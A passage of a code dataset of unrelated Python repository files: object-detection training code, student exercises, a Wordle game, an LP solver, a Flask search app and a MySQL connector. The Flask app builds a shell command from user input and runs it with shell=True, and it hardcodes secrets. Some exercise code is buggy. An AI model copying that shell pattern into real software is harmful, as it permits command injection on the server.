tf.int32)\r\n cls_target_one_hot = tf.one_hot(cls_target, depth=num_classes+1)\r\n \r\n cross_entropy_per_proposal = tf.nn.softmax_cross_entropy_with_logits(\r\n labels=tf.stop_gradient(cls_target_one_hot),\r\n logits = cls_score)\r\n \r\n #bboxes reg use non-background labels\r\n \r\n keep_ind = tf.greater(cls_target, 0)\r\n cls_target_keep = tf.boolean_mask(cls_target, keep_ind)\r\n cls_target_keep = cls_target_keep - 1\r\n \r\n cls_target_keep_one_hot = tf.one_hot(cls_target_keep, depth=num_classes)\r\n \r\n bbox_targets_keep = tf.boolean_mask(bbox_offset_targets, keep_ind)\r\n bbox_offsets_keep = tf.boolean_mask(bbox_offsets, keep_ind)\r\n \r\n bbox_flatten = tf.reshape(bbox_offsets_keep, [-1,4])\r\n cls_target_flatten = tf.reshape(cls_target_keep_one_hot,[-1])\r\n \r\n bbox_logits = tf.boolean_mask(bbox_flatten, cls_target_flatten)\r\n \r\n reg_loss_per_proposal = model.smooth_l1_loss(bbox_logits, bbox_targets_keep)\r\n \r\n rcnn_cls_loss = tf.reduce_mean(cross_entropy_per_proposal)\r\n rcnn_reg_loss = tf.reduce_mean(reg_loss_per_proposal)\r\n return rcnn_cls_loss, rcnn_reg_loss\r\n\r\ndef rcnn_preprocess(inputs):\r\n #inputs = inputs - MEAN \r\n return inputs\r\n\r\ndef roi_pool_features(conv_features, roi_proposals,img_shape):\r\n img_shape = tf.cast(img_shape, tf.float32)\r\n roi_pool_width = 7\r\n roi_pool_height = 7\r\n \r\n with tf.name_scope('roi_pool'):\r\n x1, y1, x2, y2 = tf.unstack(roi_proposals, axis=1)\r\n x1 = x1 / img_shape[0]\r\n y1 = y1 / img_shape[1]\r\n x2 = x2 / img_shape[0]\r\n y2 = y2 / img_shape[1]\r\n norm_roi_props = tf.stack([y1, x1, x2, y2], axis=1)\r\n num_props = tf.shape(norm_roi_props)[0]\r\n box_ids = tf.zeros((num_props,),dtype=tf.int32)\r\n rois_crops = tf.image.crop_and_resize(conv_features, \r\n norm_roi_props, box_ids, \r\n [roi_pool_height*2, roi_pool_width*2])\r\n roi_pool = tf.nn.max_pool(rois_crops, ksize=[1,2,2,1], strides=[1,2,2,1],padding='VALID')\r\n \r\n return roi_pool\r\n \r\n\r\ndef rcnn_targets(proposals, gt_boxes, num_classes):\r\n #proposals = proposal_boxes\r\n #gt_boxes = tf_gt_boxes\r\n #num_classes = num_classes\r\n fg_fraction = 0.25\r\n fg_thresh = 0.5\r\n bg_thresh_low = 0.0\r\n bg_thresh_high = 0.5\r\n mini_batch_size = 64\r\n\r\n overlaps = abx.iou_boxes_tf(proposals, gt_boxes[:,:4])\r\n proposals_labels_shape = tf.gather(tf.shape(proposals),[0])\r\n \r\n proposal_labels = tf.fill(dims=proposals_labels_shape, value=-1.)\r\n max_overlaps = tf.reduce_max(overlaps,axis=1)\r\n bg_low_above = tf.greater_equal(max_overlaps, bg_thresh_low)\r\n bg_high_below = tf.less(max_overlaps, bg_thresh_high)\r\n bg_low_high = tf.logical_and(bg_low_above, bg_high_below)\r\n \r\n proposal_labels = tf.where(bg_low_high, \r\n x=tf.zeros_like(proposal_labels, dtype=tf.float32), \r\n y=proposal_labels )\r\n\r\n # best gt box for each proposal and filter for fg threhsold\r\n \r\n best_gt_overlap = tf.argmax(overlaps, axis=1)\r\n proposal_labels_best_gt = tf.add(tf.gather(gt_boxes[:,4],best_gt_overlap), 1.) # 0 is the background so adding 1\r\n \r\n fg_over_thresh = tf.greater_equal(max_overlaps, fg_thresh)\r\n \r\n proposal_labels = tf.where(fg_over_thresh, x=proposal_labels_best_gt,\r\n y=proposal_labels)\r\n #best proposal for each gt box\r\n best_prop_idx = tf.argmax(overlaps, axis=0)\r\n \r\n is_best_box = tf.sparse_to_dense(sparse_indices=tf.reshape(best_prop_idx,[-1]), \r\n sparse_values=True, default_value=False,\r\n output_shape=tf.cast(proposals_labels_shape,tf.int64),\r\n validate_indices=False)\r\n \r\n best_prop_gt_label = tf.sparse_to_dense(tf.reshape(best_prop_idx,[-1]),\r\n sparse_values=gt_boxes[:,4] + 1, default_value=0.,\r\n output_shape=tf.cast(proposals_labels_shape,tf.int64),\r\n validate_indices=False)\r\n\r\n proposal_labels = tf.where(is_best_box, x=best_prop_gt_label, y=proposal_labels) \r\n\r\n fg_ind_conds = tf.logical_or(fg_over_thresh, is_best_box)\r\n fg_inds = tf.where(fg_ind_conds)\r\n \r\n max_bg = int(mini_batch_size*(1-fg_fraction))\r\n bg_inds = tf.where(tf.equal(proposal_labels,0))\r\n \r\n shuffle_bg_inds = tf.random_shuffle(bg_inds)\r\n num_reduce_inds = tf.shape(bg_inds)[0] - max_bg\r\n remove_inds = shuffle_bg_inds[:num_reduce_inds]\r\n is_remove = tf.sparse_to_dense(sparse_indices=remove_inds, sparse_values = True, default_value=False,\r\n output_shape=tf.cast(proposals_labels_shape,tf.int64),\r\n validate_indices=False)\r\n proposal_labels = tf.where(condition=is_remove, x=tf.fill(dims=proposals_labels_shape,value=-1.),\r\n y=proposal_labels)\r\n \r\n target_available = tf.greater(proposal_labels, 0)\r\n prop_tgt_ids = tf.where(target_available)\r\n # get gt box is with \r\n gt_boxes_idxs = tf.gather(best_gt_overlap, prop_tgt_ids)\r\n \r\n proposal_gt_boxes = tf.gather_nd(gt_boxes[:,:4], gt_boxes_idxs)\r\n proposal_with_target = tf.gather_nd(proposals, prop_tgt_ids)\r\n \r\n bbox_targets_non_zero = abx.get_deltas_from_box(proposal_with_target, proposal_gt_boxes)\r\n bbox_targets = tf.scatter_nd(prop_tgt_ids, updates=bbox_targets_non_zero, \r\n shape=tf.cast(tf.shape(proposals), tf.int64))\r\n \r\n return proposal_labels, bbox_targets\r\n \r\n\r\n\r\n","repo_name":"prasoongupta/deep_learning-faster_RCNN","sub_path":"rcnn.py","file_name":"rcnn.py","file_ext":"py","file_size_in_byte":8455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16985066788","text":"import math\ndef theNumber(n): \n if n <= 1: \n return False\n for i in range(2, (int)(math.sqrt(n))): \n if n % i == 0: \n return False\n return True\ndef Oppour(n):\n if theNumber(n) and theNumber(n - 2): \n return True\n else: \n return False\nn = 13\nif Oppour(n) == True: \n print(\"Yes\") \nelse: \n print(\"No\")\n\ndef countThe3(n):\n count = 0\n while (n > 0):\n if (n % 10 == 3):\n count = count + 1\n n = int(n / 10)\n return count\n\ndef CountTheRange(n):\n count = 0\n for i in range(2,n):\n count = count + countThe3(i);\n return count\n\n number = int(input(\"Enter the number : \"))\n print(CountTheRange(number))\n\nmat = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\nsum = 0\ntheStart = 0\ntheEnd = 0;\nm = 3\nn = 3\ntheArr = []\nz = 0\nprint(\"Sum of rows is \", end = \"\")\nfor row in range(0, m):\n sum = 0\n for col in range(0, n):\n sum = sum + mat[row][col]\n print(sum, end = \"\")\n z = z + 1\n theArr.append(sum)\n\n temp_row = theArr[0]\n for i in range(1, m):\n if(temp_row < theArr[i]):\n temp_row = theArr[i]\n theStart = i\n print(\"Row\", theStart+1,\"has maximum sum\")\n print(\"Sum of columns is \", end = \"\")\n\n sum = 0\n y = 0\n col_arr = []\n for i in range(0, n):\n sum = 0\n for j in range(0, m):\n sum = sum + mat[j][i]\n print(sum, end = \"\")\n y = y + 1\n col_arr.append(sum)\n\n temp_col = col_arr[0]\n for i in range(1, n):\n if(temp_col < col_arr[i]):\n temp_col = col_arr[i]\n col_ind = i\nprint(\"Column\", col_ind+1,\"has maximum sum\")","repo_name":"ChrisChrisRivera/CS1-Lab","sub_path":"assign 3 CS.py","file_name":"assign 3 CS.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29999488537","text":"\ndef colour_harmony(anchor, ctype):\n colours = [\"red\", \"red-orange\", \"orange\", \"yellow-orange\", \"yellow\", \"yellow-green\", \"green\", \"blue-green\", \"blue\", \"blue-violet\", \"violet\", \"red-violet\"]\n anchor_idx = colours.index(anchor)\n ctypes = {'complementary':[6],\n 'triadic':[4,8],\n 'split_complementary':[5,7],\n 'square':[3,6,9],\n 'analogous':[1,11],\n 'rectangle':[2,6,8]}\n result = [anchor]\n for add in ctypes[ctype]:\n result += [colours[(anchor_idx+add) % 12]]\n return set(result)\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"md4AF8HwJrhrhA5zm_8.py","file_name":"md4AF8HwJrhrhA5zm_8.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72883088091","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0003_auto_20151123_1740'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Blog',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('name', models.CharField(max_length=30)),\n ('info', models.CharField(max_length=1000)),\n ('status', models.BooleanField()),\n ('user', models.ForeignKey(related_name='blog_author', to='users.Profile')),\n ],\n ),\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('text', models.CharField(max_length=5000)),\n ('file', models.FileField(upload_to=b'C:/Django/myblog/myblog/media/comment/')),\n ('post', models.ForeignKey(related_name='comment_post', to='blogs.Blog')),\n ('user', models.ForeignKey(related_name='comment_author', to='users.Profile')),\n ],\n ),\n migrations.CreateModel(\n name='Post',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('name', models.CharField(max_length=30)),\n ('text', models.CharField(max_length=10000)),\n ('annotation', models.CharField(max_length=1000)),\n ('file', models.FileField(upload_to=b'C:/Django/myblog/myblog/media/post/')),\n ('blog', models.ForeignKey(related_name='post_blog', to='blogs.Blog')),\n ('user', models.ForeignKey(related_name='post_author', to='users.Profile')),\n ],\n ),\n migrations.CreateModel(\n name='Subscription',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('blog', models.ForeignKey(related_name='sub_blog', to='blogs.Blog')),\n ('user', models.ForeignKey(related_name='sub_user', to='users.Profile')),\n ],\n ),\n ]\n","repo_name":"IbragimGabi/myblog","sub_path":"blogs/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43490134528","text":"import cv2\ndef video_reader(vid, out_width=None, out_height=None):\n width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))\n fps = int(vid.get(cv2.CAP_PROP_FPS))\n codec = cv2.VideoWriter_fourcc(*'XVID')\n out_width = int(out_width * width) or width\n out_height = int(out_height * height) or height\n out = cv2.VideoWriter(\"E:/QT-iPhone-small.mp4\", codec, fps, (out_width, out_height))\n return out, width, height, fps\nvid = cv2.VideoCapture(\"E:/QT-iPhone.mp4\")\nout, width, height, fps = video_reader(vid, 3/4, 1/2)\nframe_num = 0\nwhile True:\n frame_num += 1\n res, org_img = vid.read()\n if not res or frame_num % 10000 == 0:\n break\n # cv2.imshow(\"out\",org_img)\n # cv2.waitKey(1)\n out.write(org_img)\nout.release()\n","repo_name":"duonglh711/auto-traffic-congestion","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"1325471292","text":"class Solution():\n def strStr(self, haystack: str, needle: str) -> int:\n if needle == \"\":\n return 0\n elif needle not in haystack:\n return -1\n \n if len(haystack) < len(needle):\n return -1\n\n for i in range(len(haystack)):\n if haystack[i] == needle[0]:\n if haystack[i:i+len(needle)] == needle[0:]:\n return i\n\n return -1\n\nif __name__ == \"__main__\":\n sol = Solution()\n ans = sol.strStr(haystack = \"hello\", needle = \"ll\")\n print(ans)\n","repo_name":"wwweiwei/LeetCode","sub_path":"28. Implement strStr().py","file_name":"28. Implement strStr().py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"1486029230","text":"\"\"\"The wordle game\"\"\"\n\nimport os\nimport random\n\nfrom wordle import utils\nimport wordle\n\nVALID_WORDS = utils.read_5letter_word_file(\n os.path.join(os.path.dirname(wordle.__file__), \"datasets/5-letter-words.txt\")\n)\n\n\nclass WordleGame:\n \"\"\"The wordle game\"\"\"\n\n def __init__(\n self,\n target_word: str = None,\n max_tries: int = 5,\n valid_words: list = VALID_WORDS,\n random_seed: int = None,\n format_dict: dict = utils.TERMINAL_FORMAT,\n keyboard_layout: dict = utils.QWERTY_LAYOUT,\n ) -> None:\n self.max_tries = max_tries\n self.format_dict = format_dict\n self.keyboard_layout = keyboard_layout\n self.random_seed = random_seed\n self.valid_words = valid_words\n self.target_word = target_word\n\n # Initialise private attributes here:\n self._tries_remaining = max_tries\n self._used_words = []\n self._used_words_str = \"\"\n self._correct_letters_set = set()\n self._partially_correct_letters_set = set()\n self._wrong_letters_set = set()\n self._random = random.Random(random_seed)\n self._success = False\n self.target_word_ = self.generate_target_word(target_word)\n self._target_word_letter_pos = self.get_letter_pos_dict(self.target_word_)\n\n @property\n def tries_remaining(self):\n \"\"\"Remaining tries\"\"\"\n return self._tries_remaining\n\n def game_status_string(self):\n \"\"\"Get the game status string\"\"\"\n keyboard_str = utils.display_keyboard_str(\n correct_set=self._correct_letters_set,\n partially_correct_set=self._partially_correct_letters_set,\n wrong_set=self._wrong_letters_set,\n keyboard_layout=self.keyboard_layout,\n format_dict=self.format_dict,\n )\n return \"\\n\" + self._used_words_str + \"\\n\" + keyboard_str + \"\\n\"\n\n def user_input(self):\n \"\"\"Get user input.\"\"\"\n return input(self.game_status_string())\n\n def check_word_valid(self, word: str):\n \"\"\"Check wheter a word is valid.\"\"\"\n return word.upper() in self.valid_words\n\n def generate_target_word(self, target_word: str):\n \"\"\"Generates a target word and checks the validity if it is provided.\"\"\"\n if target_word is not None and not self.check_word_valid(target_word):\n raise ValueError(f\"Target word {target_word.upper()} is not a valid word\")\n elif target_word is not None:\n return target_word.upper()\n else:\n return self._random.choice(self.valid_words).upper()\n\n @staticmethod\n def get_letter_pos_dict(word):\n \"\"\"Get a dictionary of the position of each letter in a word\"\"\"\n return {\n letter: {i for i, w in enumerate(word) if w == letter}\n for letter in set(word)\n }\n\n def format_word(self, word, letters_status):\n \"\"\"Format a word based on the letter status list\"\"\"\n formatted_word = \"\"\n for i in range(len(letters_status)):\n status = letters_status[i]\n if status == \"correct\":\n formatted_word += utils.decorate_correct(\n word[i], format_dict=self.format_dict\n )\n elif status == \"partially_correct\":\n formatted_word += utils.decorate_partially_correct(\n word[i], format_dict=self.format_dict\n )\n elif status == \"wrong\":\n formatted_word += utils.decorate_wrong(\n word[i], format_dict=self.format_dict\n )\n else:\n raise ValueError(\"{status} is not a valid word status\")\n\n return formatted_word\n\n def process_wrong_valid_word(self, word: str):\n \"\"\"Process a wrong word that is valid\"\"\"\n letters_pos = self.get_letter_pos_dict(word)\n letters_status = [\"wrong\" for _ in range(len(word))]\n for letter, pos in letters_pos.items():\n if letter not in self._target_word_letter_pos.keys():\n self._wrong_letters_set.add(letter)\n else:\n pos_intersection = pos.intersection(\n self._target_word_letter_pos[letter]\n )\n if len(pos_intersection) != 0:\n for i in pos_intersection:\n letters_status[i] = \"correct\"\n self._correct_letters_set.add(letter)\n else:\n letters_status[min(pos)] = \"partially_correct\"\n self._partially_correct_letters_set.add(letter)\n\n self._used_words_str += (\n self.format_word(word=word, letters_status=letters_status) + \"\\n\"\n )\n\n def single_round(self):\n \"\"\"Play a single wordle round.\"\"\"\n word = self.user_input().upper().replace(\" \", \"\")\n if word == self.target_word_:\n self._used_words_str += utils.decorate_correct(word)\n self._correct_letters_set.update(set(word))\n self._success = True\n elif not self.check_word_valid(word):\n print(f\">> {word} is not a real word\")\n elif word in self._used_words:\n print(f\">> You have already used {word}\")\n else:\n self.process_wrong_valid_word(word)\n self._tries_remaining -= 1\n self._used_words.append(word)\n\n def play(self):\n \"\"\"Play the game.\"\"\"\n while self._tries_remaining > 0 and not self._success:\n self.single_round()\n\n if self._success:\n print(\"\\n>> Congrats, you won!\")\n print(self.game_status_string())\n else:\n print(f\"\\n>> You lost... the word was {self.target_word_}\")\n print(self.game_status_string())\n","repo_name":"ltsaprounis/python-wordle","sub_path":"wordle/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20514158577","text":"import numpy as np\nfrom utils import binary_search_step_size\n\n\nclass SelfDualPrimalDualPathFollowing:\n def __init__(self, c, A, b, eps=1e-6):\n # A is in shape of (self.m, self.n)\n self.m, self.n = A.shape\n\n # convert to self-dual LP\n (M0, q0) = self._make_Mq_from_cAb(c, A, b)\n\n # create an artificial problem and initial values\n (self.M, self.q, self.x, self.z) = self._make_artProb_initialPoint(M0, q0)\n self.primal_vars = None\n self.dual_vars = None\n\n # machine epsilon\n self.eps = eps\n\n # counting iteration\n self.count = 0\n\n def _make_Mq_from_cAb(self, c, A, b):\n \"\"\"\n Convert a LP problem into a Self-Dual LP problem such that\n minimize q^Tx\n subject to Mx + q = z, x >= 0, z>= 0\n where M = -M.T, q >= 0\n\n M, x, and q are defined as follows.\n M = [[0, -A, b],\n [A.T, 0, -c],\n [-b.T, c.T, 0]]\n x = [y, x, tau]\n q = 0\n\n Args:\n c: np.array of shape (n,)\n A: np.array of shape (m, n)\n b: np.array of shape (m,)\n\n Outputs:\n M: np.array of shape (m+n+1, m+n+1)\n q: np.array of shape (m+n+1,)\n \"\"\"\n m1 = np.hstack((np.zeros((self.m, self.m)), -A, b.reshape(self.m, -1)))\n m2 = np.hstack((A.T, np.zeros((self.n, self.n)), -c.reshape(self.n, -1)))\n m3 = np.append(np.append(-b, c), 0)\n M = np.vstack((m1, m2, m3))\n q = np.zeros(self.m + self.n + 1)\n return M, q\n\n def _make_artProb_initialPoint(self, M0, q0):\n \"\"\"\n Convert a Self-Dual LP problem into an equivalent Self-Dual LP problem which has an interior point.\n The interior point can be used as an initial value\n\n Args:\n M0: np.array of shape (k, k)\n q0: np.array of shape (k,)\n\n Returns:\n MM: np.array of shape (N, N)\n qq: np.array of shape (N,)\n x_init: np.array of shape (N,)\n z_init: np.array of shape (N,)\n \"\"\"\n k = M0.shape[0]\n x0 = np.ones(k)\n mu0 = np.dot(q0, x0) / (k + 1) + 1\n z0 = mu0 / x0\n r = z0 - np.dot(M0, x0) - q0\n qn1 = (k + 1) * mu0 - np.dot(q0, x0)\n\n MM = np.hstack((M0, r.reshape(-1, 1)))\n MM = np.vstack((MM, np.append(-r, 0)))\n qq = np.append(q0, qn1)\n x_init = np.append(x0, 1)\n z_init = np.append(z0, mu0)\n return MM, qq, x_init, z_init\n\n def _compute_objective(self):\n return np.dot(self.x, self.z) / len(self.x)\n\n def _compute_direction(self, x, z, M, gamma=0):\n mu = self._compute_objective()\n dx = np.linalg.solve(M + np.diag(z / x), gamma * mu / x - z)\n dz = gamma * mu / x - z - z * dx / x\n return dx, dz\n\n def solve(self, max_iter=100):\n while True:\n # Predictor step\n dx, dz = self._compute_direction(self.x, self.z, self.M)\n step_size = binary_search_step_size(self.x, self.z, dx, dz, 0.5)\n self.x += step_size * dx\n self.z += step_size * dz\n\n # Corrector step\n dx, dz = self._compute_direction(self.x, self.z, self.M, gamma=1)\n self.x += dx\n self.z += dz\n\n # compute the objective value\n mu = self._compute_objective()\n\n # increment counter by 1\n self.count += 1\n\n # print\n print(\"%sth iteration: step_size = %.5f, objective value = %.5f\" % (self.count, step_size, mu))\n\n # conditions to terminate\n if mu < self.eps:\n self.primal_vars = self.x[self.m:self.m + self.n] / self.x[-2]\n self.dual_vars = self.x[:self.m] / self.x[-2]\n print(\"Optimal value = %.3f\" % np.dot(c, self.primal_vars))\n print(\"Optimal value (dual) = %.3f\" % np.dot(b, self.dual_vars))\n break\n\n if self.count > max_iter:\n print(\"Optimal value is not found\")\n break\n\n\nif __name__ == \"__main__\":\n c = np.array([4, 3, 5])\n A = np.array([[2, 2, -1], [2, -2, 3], [0, 2, -1]])\n b = np.array([6, 8, 4])\n print(\"A toy example\")\n prob = SelfDualPrimalDualPathFollowing(c, A, b)\n prob.solve()\n x, y = prob.primal_vars, prob.dual_vars\n print(np.round(x, 3))\n print(np.round(y, 3))\n print()\n\n c = np.array([150, 200, 300])\n A = np.array([[3, 1, 2], [1, 3, 0], [0, 2, 4]])\n b = np.array([60, 36, 48])\n print(\"Production problem\")\n prob = SelfDualPrimalDualPathFollowing(c, A, b)\n prob.solve()\n x, y = prob.primal_vars, prob.dual_vars\n print(np.round(x, 3))\n print(np.round(y, 3))\n print()\n","repo_name":"tfushimi/optimization","sub_path":"interior_point_method/self_dual_interior_point_method.py","file_name":"self_dual_interior_point_method.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21324693323","text":"import flask\nimport subprocess\nimport redis\nimport pysolr\nimport pprint\nimport json\nimport flask_cors\n\napp=flask.Flask(__name__)\napp.config[\"DEBUG\"]=True\napp.config[\"TOKEN\"]=\"bharathkarkera\"\napp.secret_key = 'bharathkarkera'\napp.config['CORS_HEADERS'] = 'Content-Type'\n\nredis=redis.Redis(host='localhost',port=6379)\n\n@app.route('/',methods=[\"GET\"])\ndef index_fun():\n flask.flash(\"Search for a site...\")\n return flask.render_template(\"index.html\")\n\n\n@app.route(\"/search\", methods=[\"POST\",\"GET\"])\ndef greet():\n redis.incr(\"hits\")\n first_part='unset GREP_OPTIONS ; unset GREP_COLOR ; cat /Users/bharathkarkera/practice/python/search_engine2/URL_list.txt |grep -i \"'\n sec_part=flask.request.form['search_parameter']\n #sec_part=flask.request.form['search-box']\n third_part='\" |sed G > /Users/bharathkarkera/practice/python/search_engine2/raw_result.txt'\n args = first_part+sec_part+third_part\n print(args)\n result=subprocess.run(args,capture_output=True, shell=True)\n\n args ='/bin/bash /Users/bharathkarkera/practice/python/search_engine2/html_former.sh'\n result=subprocess.run(args,capture_output=True, shell=True)\n\n flask.flash(\"Showing results for : \"+str(flask.request.form['search_parameter'])+\"( \"+str(int(redis.get(\"hits\")))+\"th hit to the site ! )\")\n return flask.render_template(\"test.html\"),{\"Refresh\":\"10; url=http://localhost:80\"}\n\n@flask_cors.cross_origin(origin='*',headers=['access-control-allow-origin','Content-Type'])\n@app.route(\"/autopopulate\",methods=[\"GET\",\"POST\"])\ndef auto_populate_fun():\n query=flask.request.args[\"q\"].lower()\n print(f\"query for autocomplete: {query}\")\n search_engine_collection=pysolr.Solr(\"http://localhost:8983/solr/search_engine_collection\")\n q=f\"name:*{query}* OR URL:*{query}*\"\n rows=10\n filtered_results=search_engine_collection.search(q,**{'rows':rows})\n pprint.pprint(filtered_results.docs)\n\n name_list=[]\n for i in filtered_results.docs:\n name_list.append(str(i['name'][0]))\n\n print(json.dumps(name_list))\n return json.dumps(name_list)\n\n\n\n#app.run(host=\"0.0.0.0\")\n#cat URL_list.txt | sed 's/-->/~/g' | cut -d '~' -f 1|sed -E '/^$/d' | sed -E 's/^(.*) $/\"\\1\"/g' | tr '\\n' ','\n#cat URL_list.txt| sed 's/-->/|/g' | tr -d ' ' > document.txt\n#with open(\"/Users/bharathkarkera/practice/python/search_engine2/document.txt\",\"r\") as read_file_obj:\n# with open(\"/Users/bharathkarkera/practice/python/search_engine2/document.csv\",\"w\") as write_file_obj:\n# csv.writer(write_file_obj,delimiter=',').writerows(csv.reader(read_file_obj,delimiter='|'))\n#solr create -c search_engine_collection -p 8983\n#curl -i 'http://localhost:8983/solr/search_engine_collection/update?commit=true' --data-binary @/Users/bharathkarkera/practice/python/search_engine2/document.csv -H 'Content-type:application/csv'\n#search_engine_collection=pysolr.Solr(\"http://localhost:8983/solr/search_engine_collection\")\n#all_results=search_engine_collection.search(\"*:*\")\n#pprint.pprint(all_results.docs)\n#curl -vi \"http://localhost:8983/solr/admin/cores?action=UNLOAD&deleteInstanceDir=true&core=search_engine_collection\"\n#query=\"apple\"\n#q=f\"name:*{query}* OR URL:*{query}*\"\n#rows=10\n#filtered_results=search_engine_collection.search(q,**{'rows':rows})\n#pprint.pprint(filtered_results.docs)\n#curl -i \"http://bharathkarkera:80/autopopulate?q=git\n# curl -i \"http://bharathkarkera:80/search\" -d \"search_parameter=MDN\"\n","repo_name":"BharathKarkera/Solr_based_searchZ_engine","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2762079240","text":"'''\nThe Database class can be used to reference the database in any\nfile using the exec() function. Simply pass the SQL command to\nthis function and it will return the result, if there is one.\n\nEach instance of the database class uses the same connection, but\neach instance can initiate a \"reconnect\", if necessary.\n'''\n\n\nimport aiomysql\nimport dns.resolver\nimport os\nimport asyncio\nfrom dotenv import load_dotenv\nload_dotenv()\n\ndb = None\ncur = None\nconn = None\nresolve = dns.resolver.query(os.getenv('REMOTE_DOMAIN'), 'A')\nip = None\nfor ipval in resolve:\n ip = ipval.to_text()\n\n\npool = None\nasync def connect_pool():\n global pool\n\n try:\n print(\"\\n\\nAttempting local database pool connection...\")\n if os.getenv('CONNECTION') == \"REMOTE\": raise Exception\n pool = await aiomysql.create_pool(\n host='192.168.0.12',\n port=3306,\n connect_timeout=2,\n user=os.getenv('DATABASE_USERNAME'),\n password=os.getenv('DATABASE_PASSWORD'),\n db=os.getenv('DATABASE'),\n loop=asyncio.get_event_loop(),\n autocommit=True\n )\n print(\"Database pool connected locally!\\n\")\n except Exception as e:\n print(f\"Database server not running locally, attempting database pool connection via Cloudflare...\")\n try:\n pool = await aiomysql.create_pool(\n host=ip,\n port=3306,\n user=os.getenv('DATABASE_USERNAME'),\n password=os.getenv('DATABASE_PASSWORD'),\n db=os.getenv('DATABASE'),\n loop=asyncio.get_event_loop(),\n autocommit=True\n )\n print(\"Database pool connected via Cloudflare!\\n\")\n except:\n print(f\"\\n##### FAILED TO CONNECT TO DATABASE! #####\\n{e}\\n\")\n\n\nasync def check_pool():\n global pool\n if pool is None:\n await connect_pool()\n if pool.closed:\n print(f\"\\n\\n####### DATABASE POOL CONNECTION LOST! Attempting to reconnect... #######\")\n await connect_pool()\n\n\nclass AsyncDatabase:\n\n def __init__(self, file):\n self.file = file\n\n async def execute(self, exec_cmd: str):\n global pool\n for attempt in range(1,6):\n try:\n async with pool.acquire() as conn:\n cursor = await conn.cursor()\n await cursor.execute(exec_cmd)\n except Exception as e:\n if attempt < 5:\n if os.getenv('DATABASE_DEBUG') != \"1\": await asyncio.sleep(5)\n await check_pool()\n continue\n else:\n print(f\"\\nASYNC DATABASE ERROR! [{self.file}] Could not execute: \\\"{exec_cmd}\\\"\\n{e}\")\n break\n \n if exec_cmd.startswith(\"SELECT\"):\n val = await cursor.fetchall()\n if len(val) == 1:\n if len(val[0]) == 1:\n return val[0][0]\n return val if val != () else [] # easier migration from old synchronous code\n return\n \n def exists(self, rows):\n return rows > 0","repo_name":"ryandis44/bento-bot","sub_path":"Database/DatabaseConnector.py","file_name":"DatabaseConnector.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"35520474128","text":"import model\nimport tensorflow as tf\nfrom pipeline import input_pipeline\nimport shutil\nimport os\nimport data\nfrom tqdm import tqdm\n\nTRAINING_DATASET = '/media/lsmjn/56fcc20e-a0ee-45e0-8df1-bf8b2e9a43b2/tfrecords/NGII_training.tfrecords'\nVALIDATION_DATASET = '/media/lsmjn/56fcc20e-a0ee-45e0-8df1-bf8b2e9a43b2/tfrecords/NGII_validation.tfrecords'\nBATCH_SIZE = 8\nNUM_EPOCHS = 20\n\ndef train(d, batch_size, epoch):\n #Set directory for tensorboard and trained model\n TB_DIR = '/home/lsmjn/Drone-Deconv/tb'\n TRAINED_MODEL_DIR = 'trained_model'\n '''\n try:\n shutil.rmtree(TB_DIR)\n shutil.rmtree(TRAINED_MODEL_DIR)\n except Exception as e:\n print(e)\n os.makedirs(TB_DIR)\n os.makedirs(TRAINED_MODEL_DIR)\n '''\n\n #Set saver and merge\n saver = tf.train.Saver()\n merged = tf.summary.merge_all()\n\n #Get steps per epoch\n steps = data.get_steps_per_epoch(batch_size, 'training')\n\n #Start Training\n with tf.Session() as sess:\n train_writer = tf.summary.FileWriter(TB_DIR + '/train', sess.graph)\n test_writer = tf.summary.FileWriter(TB_DIR + '/test')\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n sess.run(tf.global_variables_initializer())\n sess.run(tf.local_variables_initializer())\n\t\t\n k = 0\n\n for i in range(0, epoch):\n print('epoch # %d' % i)\n for j in tqdm(range(0, steps)):\n sess.run(d.train_step, feed_dict={d.am_testing: False})\n if k % 100 == 0:\n summary, _ = sess.run([merged, d.train_step], feed_dict={d.am_testing: False})\n train_writer.add_summary(summary, k)\n summary, _ = sess.run([d.xe_valid_summary, d.cross_entropy_valid], feed_dict={d.am_testing: True})\n test_writer.add_summary(summary, k)\n k = k + 1\n \n coord.request_stop()\n coord.join(threads)\n save_path = saver.save(sess, 